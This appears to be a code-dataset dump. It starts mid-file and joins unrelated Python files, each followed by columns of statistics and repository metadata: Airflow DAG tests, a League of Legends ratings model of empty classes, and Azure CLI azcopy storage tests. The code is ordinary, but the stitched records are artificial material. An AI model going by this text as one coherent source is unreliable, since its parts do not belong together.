configure(self): self.optionBoolean('foo', default=True) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], False) if __name__ == '__main__': unittest.main()
27.546099
64
0.725283
499
3,884
5.541082
0.116232
0.159132
0.099458
0.111392
0.909946
0.909946
0.909946
0.894033
0.893671
0.893671
0
0.005646
0.133625
3,884
140
65
27.742857
0.816048
0.025489
0
0.745455
0
0
0.120667
0.090236
0
0
0
0
0.181818
1
0.2
false
0
0.036364
0
0.363636
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
465c55d2b3c364fe21a054436c9fa2669f92774a
15,524
py
Python
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
from datetime import datetime import sqlalchemy as sa from airflow.operators.python_operator import PythonOperator from dataflow.dags import _PandasPipelineWithPollingSupport, _PipelineDAG from dataflow.utils import TableConfig, LateIndex from tests.unit.utils import get_base_dag_tasks def test_base_dag_tasks(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) dag = TestDAG().get_dag() assert {t.task_id for t in dag.tasks} == get_base_dag_tasks( with_modified_date_check=False ) def test_dag_tasks_with_source_modified_data_utc_callable(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) @staticmethod def get_source_data_modified_utc(self) -> datetime: return datetime(2020, 1, 1) def get_source_data_modified_utc_callable(self): return self.get_source_data_modified_utc dag = TestDAG().get_dag() assert {t.task_id for t in dag.tasks} == get_base_dag_tasks( with_modified_date_check=True ) def test_pipeline_dag_task_relationships(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) dag = TestDAG().get_dag() fetch_data = dag.get_task('fetch-data') create_temp_tables = dag.get_task('create-temp-tables') insert_into_temp_table = 
dag.get_task('insert-into-temp-table') drop_temp_tables = dag.get_task('drop-temp-tables') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 7 assert fetch_data.upstream_task_ids == set() assert fetch_data.downstream_task_ids == {'insert-into-temp-table'} assert create_temp_tables.upstream_task_ids == set() assert create_temp_tables.downstream_task_ids == {'insert-into-temp-table'} assert insert_into_temp_table.upstream_task_ids == { 'create-temp-tables', 'fetch-data', } assert insert_into_temp_table.downstream_task_ids == { 'check-temp-table-data', 'drop-temp-tables', } assert drop_temp_tables.upstream_task_ids == {'insert-into-temp-table'} assert drop_temp_tables.downstream_task_ids == set() assert check_temp_table_data.upstream_task_ids == {'insert-into-temp-table'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Add a late index to the table config for the DAG, which should add a new intermediate task. 
TestDAG.table_config.indexes = [LateIndex('data')] dag = TestDAG().get_dag() fetch_data = dag.get_task('fetch-data') create_temp_tables = dag.get_task('create-temp-tables') insert_into_temp_table = dag.get_task('insert-into-temp-table') drop_temp_tables = dag.get_task('drop-temp-tables') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 8 assert fetch_data.upstream_task_ids == set() assert fetch_data.downstream_task_ids == {'insert-into-temp-table'} assert create_temp_tables.upstream_task_ids == set() assert create_temp_tables.downstream_task_ids == {'insert-into-temp-table'} assert insert_into_temp_table.upstream_task_ids == { 'create-temp-tables', 'fetch-data', } assert insert_into_temp_table.downstream_task_ids == { 'create-post-insert-indexes', 'drop-temp-tables', } assert create_post_insert_indexes.upstream_task_ids == {'insert-into-temp-table'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert drop_temp_tables.upstream_task_ids == {'insert-into-temp-table'} assert drop_temp_tables.downstream_task_ids == set() assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() def test_pandas_dag_task_relationships(): class TestDAG(_PandasPipelineWithPollingSupport): use_polling = False data_getter = lambda: None # noqa: E731 table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", 
sa.Column("data", sa.Integer)), ), ) class OtherDAG(_PipelineDAG): table_config = TableConfig( table_name="test-other-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) dag = TestDAG().get_dag() scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 5 assert scrape_and_load_data.upstream_task_ids == set() assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'check-temp-table-data', } assert check_temp_table_data.upstream_task_ids == {'scrape-and-load-data'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Add a late index to the table config for the DAG, which should add a new intermediate task. 
TestDAG.table_config.indexes = [LateIndex('data')] dag = TestDAG().get_dag() scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 6 assert scrape_and_load_data.upstream_task_ids == set() assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Enable polling on the pipeline, which should add a new task at the start of the DAG. 
TestDAG.use_polling = True dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 7 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Enable email notifications on DAG completion, which adds a new task at the end. 
TestDAG.update_emails_data_environment_variable = 'MY_ENV_VAR' dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') send_dataset_updated_emails = dag.get_task('send-dataset-updated-emails') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 8 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == { 'drop-swap-tables', 'send-dataset-updated-emails', } assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() assert send_dataset_updated_emails.upstream_task_ids == {'swap-dataset-table'} assert send_dataset_updated_emails.downstream_task_ids == set() # Check that tasks are added to trigger downstream DAGs on successful completion of the parent. 
TestDAG.trigger_dags_on_success = [OtherDAG] dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') send_dataset_updated_emails = dag.get_task('send-dataset-updated-emails') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') trigger_other_dag = dag.get_task('trigger-OtherDAG') assert len(dag.tasks) == 9 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == { 'drop-swap-tables', 'send-dataset-updated-emails', 'trigger-OtherDAG', } assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() assert send_dataset_updated_emails.upstream_task_ids == {'swap-dataset-table'} assert send_dataset_updated_emails.downstream_task_ids == set() assert trigger_other_dag.upstream_task_ids == {'swap-dataset-table'} assert trigger_other_dag.downstream_task_ids == set()
39.805128
99
0.702783
2,097
15,524
4.851693
0.063424
0.068803
0.049145
0.074307
0.910065
0.89768
0.890112
0.878416
0.864262
0.864262
0
0.001259
0.181332
15,524
389
100
39.907455
0.799276
0.029181
0
0.804795
0
0
0.187135
0.076938
0
0
0
0
0.373288
1
0.034247
false
0
0.020548
0.020548
0.116438
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
4684f4e96e9c4cb0667bc158f53fe5337d2c0919
6,545
py
Python
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
from getratings.models.ratings import Ratings class NA_Irelia_Mid_Aatrox(Ratings): pass class NA_Irelia_Mid_Ahri(Ratings): pass class NA_Irelia_Mid_Akali(Ratings): pass class NA_Irelia_Mid_Alistar(Ratings): pass class NA_Irelia_Mid_Amumu(Ratings): pass class NA_Irelia_Mid_Anivia(Ratings): pass class NA_Irelia_Mid_Annie(Ratings): pass class NA_Irelia_Mid_Ashe(Ratings): pass class NA_Irelia_Mid_AurelionSol(Ratings): pass class NA_Irelia_Mid_Azir(Ratings): pass class NA_Irelia_Mid_Bard(Ratings): pass class NA_Irelia_Mid_Blitzcrank(Ratings): pass class NA_Irelia_Mid_Brand(Ratings): pass class NA_Irelia_Mid_Braum(Ratings): pass class NA_Irelia_Mid_Caitlyn(Ratings): pass class NA_Irelia_Mid_Camille(Ratings): pass class NA_Irelia_Mid_Cassiopeia(Ratings): pass class NA_Irelia_Mid_Chogath(Ratings): pass class NA_Irelia_Mid_Corki(Ratings): pass class NA_Irelia_Mid_Darius(Ratings): pass class NA_Irelia_Mid_Diana(Ratings): pass class NA_Irelia_Mid_Draven(Ratings): pass class NA_Irelia_Mid_DrMundo(Ratings): pass class NA_Irelia_Mid_Ekko(Ratings): pass class NA_Irelia_Mid_Elise(Ratings): pass class NA_Irelia_Mid_Evelynn(Ratings): pass class NA_Irelia_Mid_Ezreal(Ratings): pass class NA_Irelia_Mid_Fiddlesticks(Ratings): pass class NA_Irelia_Mid_Fiora(Ratings): pass class NA_Irelia_Mid_Fizz(Ratings): pass class NA_Irelia_Mid_Galio(Ratings): pass class NA_Irelia_Mid_Gangplank(Ratings): pass class NA_Irelia_Mid_Garen(Ratings): pass class NA_Irelia_Mid_Gnar(Ratings): pass class NA_Irelia_Mid_Gragas(Ratings): pass class NA_Irelia_Mid_Graves(Ratings): pass class NA_Irelia_Mid_Hecarim(Ratings): pass class NA_Irelia_Mid_Heimerdinger(Ratings): pass class NA_Irelia_Mid_Illaoi(Ratings): pass class NA_Irelia_Mid_Irelia(Ratings): pass class NA_Irelia_Mid_Ivern(Ratings): pass class NA_Irelia_Mid_Janna(Ratings): pass class NA_Irelia_Mid_JarvanIV(Ratings): pass class NA_Irelia_Mid_Jax(Ratings): pass class NA_Irelia_Mid_Jayce(Ratings): pass class NA_Irelia_Mid_Jhin(Ratings): pass class 
NA_Irelia_Mid_Jinx(Ratings): pass class NA_Irelia_Mid_Kalista(Ratings): pass class NA_Irelia_Mid_Karma(Ratings): pass class NA_Irelia_Mid_Karthus(Ratings): pass class NA_Irelia_Mid_Kassadin(Ratings): pass class NA_Irelia_Mid_Katarina(Ratings): pass class NA_Irelia_Mid_Kayle(Ratings): pass class NA_Irelia_Mid_Kayn(Ratings): pass class NA_Irelia_Mid_Kennen(Ratings): pass class NA_Irelia_Mid_Khazix(Ratings): pass class NA_Irelia_Mid_Kindred(Ratings): pass class NA_Irelia_Mid_Kled(Ratings): pass class NA_Irelia_Mid_KogMaw(Ratings): pass class NA_Irelia_Mid_Leblanc(Ratings): pass class NA_Irelia_Mid_LeeSin(Ratings): pass class NA_Irelia_Mid_Leona(Ratings): pass class NA_Irelia_Mid_Lissandra(Ratings): pass class NA_Irelia_Mid_Lucian(Ratings): pass class NA_Irelia_Mid_Lulu(Ratings): pass class NA_Irelia_Mid_Lux(Ratings): pass class NA_Irelia_Mid_Malphite(Ratings): pass class NA_Irelia_Mid_Malzahar(Ratings): pass class NA_Irelia_Mid_Maokai(Ratings): pass class NA_Irelia_Mid_MasterYi(Ratings): pass class NA_Irelia_Mid_MissFortune(Ratings): pass class NA_Irelia_Mid_MonkeyKing(Ratings): pass class NA_Irelia_Mid_Mordekaiser(Ratings): pass class NA_Irelia_Mid_Morgana(Ratings): pass class NA_Irelia_Mid_Nami(Ratings): pass class NA_Irelia_Mid_Nasus(Ratings): pass class NA_Irelia_Mid_Nautilus(Ratings): pass class NA_Irelia_Mid_Nidalee(Ratings): pass class NA_Irelia_Mid_Nocturne(Ratings): pass class NA_Irelia_Mid_Nunu(Ratings): pass class NA_Irelia_Mid_Olaf(Ratings): pass class NA_Irelia_Mid_Orianna(Ratings): pass class NA_Irelia_Mid_Ornn(Ratings): pass class NA_Irelia_Mid_Pantheon(Ratings): pass class NA_Irelia_Mid_Poppy(Ratings): pass class NA_Irelia_Mid_Quinn(Ratings): pass class NA_Irelia_Mid_Rakan(Ratings): pass class NA_Irelia_Mid_Rammus(Ratings): pass class NA_Irelia_Mid_RekSai(Ratings): pass class NA_Irelia_Mid_Renekton(Ratings): pass class NA_Irelia_Mid_Rengar(Ratings): pass class NA_Irelia_Mid_Riven(Ratings): pass class NA_Irelia_Mid_Rumble(Ratings): pass class 
NA_Irelia_Mid_Ryze(Ratings): pass class NA_Irelia_Mid_Sejuani(Ratings): pass class NA_Irelia_Mid_Shaco(Ratings): pass class NA_Irelia_Mid_Shen(Ratings): pass class NA_Irelia_Mid_Shyvana(Ratings): pass class NA_Irelia_Mid_Singed(Ratings): pass class NA_Irelia_Mid_Sion(Ratings): pass class NA_Irelia_Mid_Sivir(Ratings): pass class NA_Irelia_Mid_Skarner(Ratings): pass class NA_Irelia_Mid_Sona(Ratings): pass class NA_Irelia_Mid_Soraka(Ratings): pass class NA_Irelia_Mid_Swain(Ratings): pass class NA_Irelia_Mid_Syndra(Ratings): pass class NA_Irelia_Mid_TahmKench(Ratings): pass class NA_Irelia_Mid_Taliyah(Ratings): pass class NA_Irelia_Mid_Talon(Ratings): pass class NA_Irelia_Mid_Taric(Ratings): pass class NA_Irelia_Mid_Teemo(Ratings): pass class NA_Irelia_Mid_Thresh(Ratings): pass class NA_Irelia_Mid_Tristana(Ratings): pass class NA_Irelia_Mid_Trundle(Ratings): pass class NA_Irelia_Mid_Tryndamere(Ratings): pass class NA_Irelia_Mid_TwistedFate(Ratings): pass class NA_Irelia_Mid_Twitch(Ratings): pass class NA_Irelia_Mid_Udyr(Ratings): pass class NA_Irelia_Mid_Urgot(Ratings): pass class NA_Irelia_Mid_Varus(Ratings): pass class NA_Irelia_Mid_Vayne(Ratings): pass class NA_Irelia_Mid_Veigar(Ratings): pass class NA_Irelia_Mid_Velkoz(Ratings): pass class NA_Irelia_Mid_Vi(Ratings): pass class NA_Irelia_Mid_Viktor(Ratings): pass class NA_Irelia_Mid_Vladimir(Ratings): pass class NA_Irelia_Mid_Volibear(Ratings): pass class NA_Irelia_Mid_Warwick(Ratings): pass class NA_Irelia_Mid_Xayah(Ratings): pass class NA_Irelia_Mid_Xerath(Ratings): pass class NA_Irelia_Mid_XinZhao(Ratings): pass class NA_Irelia_Mid_Yasuo(Ratings): pass class NA_Irelia_Mid_Yorick(Ratings): pass class NA_Irelia_Mid_Zac(Ratings): pass class NA_Irelia_Mid_Zed(Ratings): pass class NA_Irelia_Mid_Ziggs(Ratings): pass class NA_Irelia_Mid_Zilean(Ratings): pass class NA_Irelia_Mid_Zyra(Ratings): pass
15.695444
46
0.766692
972
6,545
4.736626
0.151235
0.209818
0.389661
0.479583
0.803432
0.803432
0
0
0
0
0
0
0.169748
6,545
416
47
15.733173
0.847258
0
0
0.498195
0
0
0
0
0
0
0
0
0
1
0
true
0.498195
0.00361
0
0.501805
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
1
0
0
8
46a31bb804fe884424d13301867c472f090e4cb6
10,233
py
Python
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
1
2019-07-27T11:23:36.000Z
2019-07-27T11:23:36.000Z
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
null
null
null
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
null
null
null
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import os import shutil from azure.cli.testsdk import (StorageAccountPreparer, LiveScenarioTest, JMESPathCheck, ResourceGroupPreparer, api_version_constraint) from ..storage_test_util import StorageScenarioMixin, StorageTestFilesPreparer class StorageAzcopyTests(StorageScenarioMixin, LiveScenarioTest): @ResourceGroupPreparer() @StorageAccountPreparer() @StorageTestFilesPreparer() def test_storage_blob_azcopy_sync(self, resource_group, storage_account_info, test_dir): storage_account, _ = storage_account_info container = self.create_container(storage_account_info) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage blob delete-batch -s {} --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 0)) # resync container self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) # update file with open(os.path.join(test_dir, 'readme'), 'w') as f: f.write('updated.') # sync one blob self.cmd('storage blob list -c {} --account-name {} --prefix readme'.format( container, storage_account), checks=JMESPathCheck('[0].properties.contentLength', 87)) self.cmd('storage blob sync -s "{}" -c {} --account-name {} -d readme'.format( 
os.path.join(test_dir, 'readme'), container, storage_account)) self.cmd('storage blob list -c {} --account-name {} --prefix readme'.format( container, storage_account), checks=JMESPathCheck('[0].properties.contentLength', 8)) # delete one file and sync os.remove(os.path.join(test_dir, 'readme')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 40)) # delete one folder and sync shutil.rmtree(os.path.join(test_dir, 'apple')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) # syn with another folder self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( os.path.join(test_dir, 'butter'), container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 20)) # empty the folder and sync shutil.rmtree(os.path.join(test_dir, 'butter')) shutil.rmtree(os.path.join(test_dir, 'duff')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 0)) @ResourceGroupPreparer() @StorageAccountPreparer() @StorageTestFilesPreparer() def test_storage_blob_azcopy_remove(self, resource_group, storage_account_info, test_dir): storage_account, _ = storage_account_info container = self.create_container(storage_account_info) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), 
checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n readme --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 40)) self.cmd('storage remove -c {} -n apple --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) self.cmd('storage remove -c {} -n butter --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 20)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 10)) self.cmd('storage remove -c {} -n duff --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 10)) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --exclude "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --exclude "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 32)) self.cmd('storage remove -c {} -n butter --account-name {} 
--recursive --exclude "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 23)) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --include "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 39)) self.cmd('storage remove -c {} -n butter --account-name {} --include "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --include "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 21)) @ResourceGroupPreparer() @StorageAccountPreparer() def test_storage_file_azcopy_remove(self, resource_group, storage_account): account_info = self.get_account_info(resource_group, storage_account) s1 = self.create_share(account_info) s2 = self.create_share(account_info) d1 = 'dir1' d2 = 'dir2' self.storage_cmd('storage directory create --share-name {} -n {}', account_info, s1, d1) self.storage_cmd('storage directory create --share-name {} -n {}', account_info, s2, d2) local_file = self.create_temp_file(512, full_random=False) src1_file = os.path.join(d1, 'source_file1.txt') src2_file = os.path.join(d2, 'source_file2.txt') self.storage_cmd('storage file upload -p "{}" --share-name {} --source "{}"', account_info, src1_file, s1, local_file) self.storage_cmd('storage file exists 
-p "{}" -s {}', account_info, src1_file, s1) \ .assert_with_checks(JMESPathCheck('exists', True)) self.storage_cmd('storage remove --share-name {} -p "{}"', account_info, s1, src1_file) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src1_file, s1) \ .assert_with_checks(JMESPathCheck('exists', False)) self.storage_cmd('storage file upload -p "{}" --share-name {} --source "{}"', account_info, src2_file, s2, local_file) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src2_file, s2) \ .assert_with_checks(JMESPathCheck('exists', True)) self.storage_cmd('storage remove --share-name {} -p "{}"', account_info, s2, d2) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src2_file, s2) \ .assert_with_checks(JMESPathCheck('exists', False))
53.296875
110
0.609596
1,127
10,233
5.393079
0.116238
0.126686
0.177855
0.166996
0.861797
0.849951
0.823955
0.811122
0.781178
0.769003
0
0.010431
0.222418
10,233
191
111
53.575916
0.753425
0.052868
0
0.65035
0
0
0.309425
0.005788
0
0
0
0
0.027972
1
0.020979
false
0
0.027972
0
0.055944
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
